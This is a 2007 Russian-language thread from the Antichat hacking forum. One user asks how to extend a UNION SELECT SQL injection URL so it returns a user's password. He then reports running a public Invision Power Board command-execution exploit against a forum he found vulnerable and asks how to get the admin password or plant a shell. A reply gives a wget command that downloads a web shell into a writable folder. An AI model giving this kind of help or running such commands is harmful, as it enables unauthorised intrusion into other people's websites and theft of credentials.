Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   помогите с Sql Inj (https://forum.antichat.xyz/showthread.php?t=32930)

Aerot1smo 07.02.2007 21:03
помогите с Sql Inj
 
вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите

n0ne 07.02.2007 21:07
универсального запроса нет :) если хочешь чтоб за тебя всё сделали то уж как минимум ссылку в студию. А если хочешь сам - то почитай в статьях про скуль инжи, клоновых тем вагон и тележка)

ice1k 07.02.2007 21:09
Цитата:
Сообщение от Aerot1smo
вот нашёл
http://target/display_page.php?i=-1+union+select+1,User(),3,4/*

как составить запрос чтобы получить пасс юзера?
прошу помогите
Если линк не хочешь светить, то пиши мне в ПМ или в асю...

n0ne 07.02.2007 22:26
Ну и мене напиши тож чтоль %)

guest3297 07.02.2007 23:31
там префикс ищи исходник.

Aerot1smo 08.02.2007 22:09
решил новую тему не делать
всем привет опять,нашёл форум уязвимый IPB 2.1.5
заюзал сплойт Invision Power Board 2.* commands execution exploit by RST/GHC
вродебы всё ок,тока вот теперь появилась строка "Command for execute or 'exit' for exit #" чё там писать(напривем чтоб получить пасс админа или залить шелл)?

n0ne 08.02.2007 22:58
ищешь папку, где у тебя прав хватает на запись и там:
wget site.com/yourshell.php
про комманды можно в гугле много интересного найти)


Время: 02:28